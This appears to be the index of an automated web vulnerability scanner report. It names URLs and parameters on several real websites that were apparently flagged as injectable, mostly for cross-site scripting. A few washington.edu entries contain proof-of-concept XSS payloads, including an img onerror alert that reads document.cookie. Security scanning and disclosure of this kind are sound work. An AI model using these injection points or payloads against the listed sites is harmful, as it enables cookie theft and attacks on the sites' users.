http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_width parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_border parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_height parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_margin parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_width parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_x parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_y parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_interval parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_speed parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_type parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_text_type parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [autoanimation parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [base_bgcolor parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [clickable_slides parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_x parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_y parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [mid parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [text_block_opacity parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color_inactive parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_margin parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_width parameter]
http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [img_width parameter]
http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [modid parameter]
http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]
http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter]
http://www.traderonline.com/about/ [REST URL parameter 1]
http://www.traderonline.com/about/feedback/ [REST URL parameter 1]
http://www.traderonline.com/about/feedback/ [REST URL parameter 2]
http://www.traderonline.com/about/feedback/ [name of an arbitrarily supplied request parameter]
http://www.traderonline.com/about/magazines/ [REST URL parameter 1]
http://www.traderonline.com/about/magazines/ [REST URL parameter 2]
http://www.traderonline.com/about/newsletter/ [REST URL parameter 1]
http://www.traderonline.com/about/newsletter/ [REST URL parameter 2]
http://www.traderonline.com/advertise/ [REST URL parameter 1]
http://www.traderonline.com/advertiser-agreement/ [REST URL parameter 1]
http://www.traderonline.com/advertiser-agreement/ [name of an arbitrarily supplied request parameter]
http://www.traderonline.com/copyright/ [REST URL parameter 1]
http://www.traderonline.com/css/promoCSS.php [REST URL parameter 1]
http://www.traderonline.com/css/tolhomecss.php [REST URL parameter 1]
http://www.traderonline.com/find/ [REST URL parameter 1]
http://www.traderonline.com/javascript/master_s_code.js [REST URL parameter 1]
http://www.traderonline.com/javascript/realmedia.js [REST URL parameter 1]
http://www.traderonline.com/myt/ [REST URL parameter 1]
http://www.traderonline.com/myt/ [name of an arbitrarily supplied request parameter]
http://www.traderonline.com/privacy-policy/ [REST URL parameter 1]
http://www.traderonline.com/research/ [REST URL parameter 1]
http://www.traderonline.com/security/ [REST URL parameter 1]
http://www.traderonline.com/security/ [name of an arbitrarily supplied request parameter]
http://www.traderonline.com/sell/ [REST URL parameter 1]
http://www.traderonline.com/sitemap/ [REST URL parameter 1]
http://www.traderonline.com/terms-of-use/ [REST URL parameter 1]
http://www.traderonline.com/x22 [REST URL parameter 1]
http://www.traderonline.com/x22 [name of an arbitrarily supplied request parameter]
http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]
http://www.washington.edu/alpine/ [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img [name of an arbitrarily supplied request parameter]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 [name of an arbitrarily supplied request parameter]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ [name of an arbitrarily supplied request parameter]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie [name of an arbitrarily supplied request parameter]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ [REST URL parameter 1]
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ [name of an arbitrarily supplied request parameter]
http://www.washington.edu/pine/ [REST URL parameter 1]
http://www.x64bitdownload.com/ [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-assembling-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-assembling-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-atom-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-atom-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-audio-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-audio-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-automatic-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-automatic-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-binaries-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-binaries-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-binary-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-binary-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-board-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-board-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-boards-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-client-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-client-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-conference-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-cross-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-cross-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-download-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-download-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-downloader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-downloader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-feed-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-feed-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-forum-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-forums-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-forums-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-grabber-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-grabber-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-group-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-group-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-images-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-images-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-internet-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-internet-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-kill-file-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-killfile-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-mp3-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-mp3-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-multipart-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-multipart-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-news-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-news-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-nntp-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-nntp-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-nzb-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-nzb-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-ozum-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-ozum-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-par-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-par-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-podcast-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-podcast-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rar-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rar-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-reader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-reader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-reading-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-reading-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rss-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rss-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-search-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-search-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-ssl-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-ssl-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-synchronize-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-troll-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-use-next-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-use-next-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-usenet-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-usenet-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-usenext-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-usenext-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-video-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-video-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-xpat-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-xpat-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/64-bit-yenc-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/64-bit-yenc-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [REST URL parameter 1]
http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 1]
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 2]
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/contact.html [REST URL parameter 1]
http://www.x64bitdownload.com/contact.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/contact.html [subject parameter]
http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1]
http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2]
http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 1]
http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 2]
http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [name of an arbitrarily supplied request parameter]
http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 1]
http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 2]
http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [name of an arbitrarily supplied request parameter]
